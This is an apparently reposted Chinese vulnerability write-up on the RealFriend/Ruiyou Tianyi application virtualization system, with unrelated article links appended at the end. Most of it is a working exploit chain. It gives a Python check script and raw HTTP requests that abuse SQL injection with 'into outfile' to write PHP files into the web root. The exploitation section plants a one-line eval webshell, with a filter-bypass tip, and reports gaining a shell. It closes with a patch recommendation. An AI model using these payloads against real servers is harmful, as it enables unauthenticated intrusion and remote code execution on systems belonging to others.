瑞友天翼应用虚拟化系统RCE漏洞复现+利用

1、产品简介

       瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算架构的应用虚拟化平台。它将用户各种应用软件集中部署在瑞友天翼服务器(群)上,客户端通过WEB即可快速安全的访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等,从而为用户打造集中、便捷、安全、高效的虚拟化支撑平台。

2、漏洞概述

    瑞友天翼应用虚拟化系统存在远程代码执行漏洞,未经身份认证的远程攻击者可以利用该漏洞在目标系统上执行任意代码,(该漏洞是通过SQL注入写入后门文件进行代码执行)

3、影响范围

 影响版本

  5.x <= 瑞友天翼应用虚拟化系统 <= 7.0.2.1

不受影响版本

 瑞友天翼应用虚拟化系统 >= 7.0.3.1

4、复现环境

 Windows10搭建6.0.5.1漏洞版本

安装包: https://pan.baidu.com/s/17Y2nZFnvwXbxA1ACt06sLw    提取码: kymc

一直默认下一步,安装好重启电脑即可

52aaad5ab59844afbf020779c93312ea.png

通过/RapAgent.xgi?CMD=GetRegInfo查看漏洞环境版本 

d3a9f5dc7ae94df8a029acd2635a8541.png

5、漏洞复现 

  漏洞检测脚本:

'''
SQL注入-->RCE  EXP
瑞友天翼应用虚拟化系统RCE漏洞
影响版本
5.x<=version<=7.0.2.1
安全版本
version>=7.0.3.1
'''import requests
import sysurl = sys.argv[1]
payload="/AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5C1.php%22+--+-&cmd=UserLogin"
repose = requests.get(url=url+payload)
if repose.status_code ==200:a = url + '1.php'b = requests.get(url=a)if b.status_code == 200:print('[+] 漏洞存在,验证地址: {}1.php '.format(url))

原理:利用已知poc,通过sql注入写入php文件 ,内容是phpinfo()(只对默认安装路径起作用,请根据环境自行修改payload中的路径)

效果如下:

d17e53673ed64456a8693aad54414a36.png

ad39bde8635649bc8d4ac0b8ca9cd5b6.png

手动复现

burp抓取首页包发送Reprater模块,构造payload进行复现

GET /AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5C2.php%22+--+-&cmd=UserLogin HTTP/1.1
Host: 192.168.189.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: CookieLanguageName=ZH-CN; CookieAuthType=0
Upgrade-Insecure-Requests: 1

fc44c139f8ad48159dcd348b43e867e5.png

3c20ced3f6d245b88a98cb7bab98648a.png 

6、漏洞利用 

尝试写入php一句话马子,需要对特殊符号进行url编码(经测试,漏洞环境过滤了单引号,需采用双引号或者使用hex编码bypass)

exp

GET /AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3c%3fphp+eval%28%24%5fPOST%5b%22cmd%22%5d%29%3b%3f%3e%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5C5.php%22+--+-&cmd=UserLogin HTTP/1.1
Host: 192.168.189.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: CookieLanguageName=ZH-CN; CookieAuthType=0
Upgrade-Insecure-Requests: 1

写入的一句话马子,冰蝎和哥斯拉的也都可以,自行测试

9ee23b6243fc438c909963a0d6bbb4fe.png

 

 

6791166fe37f4a13b7e7a2f726cc76ef.png

成功获取shell

9b0006bfadc74fdf930b63a7c1a88279.png 

 7、修复建议

目前官方已发布安全更新,建议受影响用户尽快更新至安全版本:

瑞友天翼应用虚拟化系统 V7.0.3.1

下载地址:http://soft.realor.cn:88/Gwt7.0.3.1.exe

   非必要不建议将该系统暴露在公网。

 

 

 

 

 

 

 

 

 

 

 

 

 

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://xiahunao.cn/news/1618946.html

如若内容造成侵权/违法违规/事实不符,请联系瞎胡闹网进行投诉反馈,一经查实,立即删除!

相关文章

Autosar存储入门系列03_NVM状态机及读写存储调用逻辑

本文框架 0.前言1. NVM状态机介绍2. NVM读/写基本逻辑2.1 NVM读操作2.2 NVM写操作2.2.1 实时写2.2.2 下电写 2.3 NVM写入注意事项 0.前言 本系列是Autosar存储入门系列&#xff0c;希望能从学习者的角度把存储相关的知识点梳理一遍&#xff0c;这个过程中如果大家觉得有讲得不…

PC天翼云盘v6.3.4精简版

介绍&#xff1a; 由于天翼云盘网页端不能上传大文件了&#xff0c;需要客户端&#xff0c;于是制作了绿色版&#xff0c;直接打开就能用&#xff0c;装到u盘&#xff0c;走到哪用到哪。 下载不限速&#xff0c;上传文件大小无限制&#xff0c;支持识别MD5秒传。 这是天翼云盘…

如何外网登录访问瑞友天翼应用虚拟化系统?——快解析内网端口映射方案

瑞友天翼应用虚拟化系统&#xff08;GWT System&#xff09;是国内具有自主知识产权的应用虚拟化平台&#xff0c;是基于服务器计算&#xff08;Server-based Computing&#xff09;的应用虚拟化平台。如何将内网平台提供到互联网上外网访问&#xff0c;是我们比较关注的问题。…

Goby 漏洞更新 | 瑞友天翼应用虚拟化系统 index.php 文件远程代码执行漏洞

漏洞名称&#xff1a; 瑞友天翼应用虚拟化系统 index.php 文件远程代码执行漏洞 English Name&#xff1a;Ruiyou Tianyi Application Virtualization System Index.php File Remote Code Execution Vulnerability CVSS core: 9.3 影响资产数&#xff1a;61711 漏洞描述&am…

[maven]关于pom文件中的<relativePath>标签

关于pom文件中的<relativePath>标签 为什么子工程要使用relativePath准确的找到父工程pom.xml.因为本质继承就是pom的继承。父工程pom文件被子工程复用了标签。&#xff08;可以说只要我在父工程定义了标签&#xff0c;子工程就可以没有&#xff0c;因为他继承过来了&…

IO模型和NGINX安装升级

IO模型和NGINX安装升级 IO模型 IO概念 I/O在计算机中指Input/Output&#xff0c; IOPS (Input/Output Per Second)即每秒的输入输出量(或读写次数)&#xff0c;是衡量磁盘性能的主要指标之一。 Linux的IO类型 磁盘I/O 磁盘I/O是进程向内核发起系统调用&#xff0c;请求磁…

EditPlus安装教程

首先官网下载EditPlus&#xff1a;https://www.editplus.com/ 然后直接一直图示安装 &#xff08;也可以放其他盘&#xff09; 最后在下图中输入下面内容&#xff1a; Username: Vovan Regcode: 3AG46-JJ48E-CEACC-8E6EW-ECUAW 大功告成&#xff01;

ICLR 2023 | StrucTexTv2:端到端文档图像理解预训练框架

点击下方卡片&#xff0c;关注“CVer”公众号 AI/CV重磅干货&#xff0c;第一时间送达 点击进入—>【计算机视觉】微信技术交流群 转载自&#xff1a;CSIG文档图像分析与识别专委会 本文简要介绍ICLR 2023录用论文“StrucTexTv2: Masked Visual-Textual Prediction for Docu…

静态方法 与 非静态方法的区别/static 关键字

为什么80%的码农都做不了架构师&#xff1f;>>> 使用static修饰的静态方法是属于整个类的类方法&#xff0c;它在内存中的代码段会随类的定义而被分配和装载&#xff1b;而非静态方法是属于具体对象的方法&#xff0c;当这个对 象创建时&#xff0c;在对象的内存中…

Python 通过traceback追溯异常信息

Python 通过traceback追溯异常信息 导入traceback包 import traceback自定义函数 def func_3():return 1 / 0def func_2():func_3()def func_1():func_2()捕捉异常 try:func_1() except Exception as e:traceback_info traceback.format_exc()print("traceback_info"…

TSRFormer:复杂场景的表格结构识别新利器

编者按&#xff1a;近年来&#xff0c;各大企业和组织机构都在经历数字化转型。将文档转换成计算机所能识别的样态&#xff0c;是数字化转型的关键步骤&#xff0c;如何识别出图片中表格具体的结构与内容&#xff0c;并直接提取其中的数据和信息是学术界和工业界共同瞩目的焦点…

C++设计模式_01_设计模式简介(多态带来的便利;软件设计的目标:复用)

文章目录 本栏简介1. 什么是设计模式2. GOF 设计模式3. 从面向对象谈起4. 深入理解面向对象5. 软件设计固有的复杂性5.1 软件设计复杂性的根本原因5.2 如何解决复杂性 ? 6. 结构化 VS. 面向对象6.1 同一需求的分解写法6.1.1 Shape1.h6.1.2 MainForm1.cpp 6.2 同一需求的抽象的…

聚类分析 | MATLAB实现基于AHC聚类算法可视化

聚类分析 | MATLAB实现基于AHC聚类算法可视化 目录 聚类分析 | MATLAB实现基于AHC聚类算法可视化效果一览基本介绍程序设计参考资料 效果一览 基本介绍 AHC聚类算法&#xff0c;聚类结果可视化&#xff0c;MATLAB程序。 Agglomerative Hierarchical Clustering&#xff08;自底…

从360随身WiFi到随身WiFi的改革发展史

摘要 随身WiFi从3G逐渐发展到4G、5G网络&#xff0c;再到WiFi&#xff0c;将网络信号转换成WiFi信号的设备&#xff0c;很大程度上的满足了出差需要移动办公的商务人士及旅游人士对网络的需求。 最先开始出现的是插电脑USB接口的随身WiFi&#xff0c;提前是你已经有了有线宽带…

360wifi使用方法|360wifi使用教程

360随身WiFi是一款超迷你、操作极其简单的无线路由器&#xff0c;只需把360随身WiFi插到一台可以上网的电脑上&#xff0c;不用做任何设置&#xff0c;就把连接有线网络的电脑转变成接入点&#xff0c;实现与其他终端的网络共享。简单方便实现手机WIFI上网。1、是否支持台式机&…

软件工程(九) UML顺序-活动-状态-通信图

顺序图和后面的一些图,要求没有用例图和类图那么高,但仍然是比较重要的,我们也需要按程度去了解。 1、顺序图 顺序图(sequence diagram, 顺序图),顺序图是一种交互图(interaction diagram),它强调的是对象之间消息发送的顺序,同时显示对象之间的交互。 下面以一个简…

iOS 4.3.5 红雪不完美越狱教程

苹果前不久放出了最新的iOS 4.3.5&#xff0c;声称是封堵了之前4.3.3的越狱漏洞&#xff0c;不过大神MuscleNerd很快就在他的推特上说Redsnow(红雪)0.98b4可以越狱4.3.5。下面为大家提供4.3.5详细越狱方法&#xff01; 什么是不完美越狱? 不完美越狱就是越狱后你的设备不能…

iPhone / iPad iOS 5.0.1完美 越狱 教程 A4/A5处理器

黑客团队Dev Team的红雪列越狱软件Redsn0w 0.9.10b1&#xff0c;可以完美越狱部分iOS 5.0.1设备,1、此次完美越狱工具支持机型&#xff1a;iPhone 3GSiPhone 4iPhone 4-CDMAiPad (第一代)iPod touch 3GiPod touch 4G不支持的机型&#xff1a;iPhone 4SiPad 22、如果以上设备还不…

果粉的福音 ios5不完美越狱图文教程

转载自&#xff1a;http://mobile.sanhaostreet.com/Newsdata/2011/10/20111017104016162.shtml 2011年10月13日随着苹果全新系统ios5的开放下载&#xff0c;让诸多果粉又一次体验到了苹果的神奇与创新。全新的ios5系统增加了200余项新功能&#xff0c;通知中心、iCloud、报刊杂…

Xcode6.1 OS X 10.10 打越狱包和免证书测试方法

公司要发布包到91助手等平台上,需要打越狱包,之前没有动手打过,于是在网上搜集资料自己整理了一下,顺便分享给大家。 我的运行环境:OS X 10.10 ,Xcode6.1 iPhone5C (已越狱,这里就不详说越狱步骤,网上很多教程也很简单)。 1、首先要自己创建证书,并且名字必须叫做,iPh…